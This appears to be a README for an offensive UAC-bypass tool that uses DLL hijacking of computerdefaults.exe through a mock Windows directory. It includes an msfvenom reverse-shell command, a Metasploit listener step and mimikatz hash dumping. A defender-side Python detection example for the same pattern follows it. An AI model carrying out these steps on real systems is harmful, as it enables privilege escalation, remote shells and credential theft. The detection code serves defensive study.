
A DLL hijacking and mock directories technique to bypass the Windows UAC security feature and get a high-privileged reverse shell. Security researchers identified this technique, which uses a simplified process of DLL hijacking and mock folders to bypass UAC. I tested this on Windows 10 and 11 and bypassed the Windows 10 UAC security feature.

Offensive-Panda/C2_Elevated_Shell_DLL_Hijcking

C2_Elevated_Shell_DLL_Hijcking

A DLL hijacking and mock directories technique to bypass the Windows UAC security feature and get a high-privileged reverse shell. Security researchers identified this technique, which uses a simplified process of DLL hijacking and mock folders to bypass UAC. I tested this on Windows 10 and 11 and bypassed the Windows 10 UAC security feature. I am using Metasploit as a C2 server to receive the reverse shell, and the “computerdefaults.exe” binary to perform the DLL hijacking attack. If an attacker gains access as that user, he will then escalate privileges in order to dump hashes and try to authenticate within the network using that user's NTLM hashes. If the attacker instead gets an elevated reverse shell as the user, he doesn't need to escalate privileges, because he already has an administrative shell on the C2 server.

USAGE

  1. Create your shellcode using msfvenom (`msfvenom -p windows/x64/shell_reverse_tcp lhost=0.0.0.0 lport=555 -f CSharp`).
  2. Compile Dllmain.cpp to create the malicious DLL and rename it to propsys.dll.
  3. Put propsys.dll and the batch file in the same directory.
  4. Start the Metasploit listener before executing the batch script.
  5. You will get an elevated shell on the C2 server.
  6. Load mimikatz in order to dump hashes.


Only for educational purposes.
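
A defender-side check for the pattern this README relies on, as an added example that is not part of the repository: it flags image-load events where a path component ends in whitespace (the published form of a mock trusted directory) or where `computerdefaults.exe` or `propsys.dll` sits outside the real system directories. The event field names, the trusted-directory list, the rule names and the sample events are assumptions constructed for illustration.

```python
import ntpath

# Assumptions: event dicts mimic Sysmon image-load (Event ID 7) fields; the
# trusted-directory list and rule names are illustrative and need local tuning.
TRUSTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
WATCHED_FILES = {"computerdefaults.exe", "propsys.dll"}  # names taken from this page

def has_mock_component(path):
    """True if any directory component ends in whitespace (e.g. 'Windows ')."""
    _, rest = ntpath.splitdrive(path)
    dirs = [p for p in rest.split("\\") if p][:-1]  # drop the file name
    return any(d != d.rstrip() for d in dirs)

def outside_trusted_dir(path):
    """True if a watched file name sits in a directory that is not literally trusted."""
    name = ntpath.basename(path).lower()
    return name in WATCHED_FILES and ntpath.dirname(path).lower() not in TRUSTED_DIRS

def classify(event):
    """Return the sorted rule names that fire for one image-load event."""
    paths = [event["Image"], event["ImageLoaded"]]
    hits = set()
    if any(has_mock_component(p) for p in paths):
        hits.add("mock-directory")
    if any(outside_trusted_dir(p) for p in paths):
        hits.add("watched-file-outside-trusted-dir")
    return sorted(hits)

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\ComputerDefaults.exe",
     "ImageLoaded": r"C:\Windows\System32\propsys.dll"},
    {"Image": r"C:\Windows \System32\ComputerDefaults.exe",
     "ImageLoaded": r"C:\Windows \System32\propsys.dll"},
    {"Image": r"C:\Users\alice\Downloads\viewer.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\propsys.dll"},
]

def scan(events):
    """Classify every event and pair the result with the process image."""
    return [(e["Image"], classify(e)) for e in events]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image!r}: {hits or 'clean'}")
```

The comparison is done on the literal path string on purpose: normalizing the path first would strip the trailing whitespace and hide the mock directory from the check.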
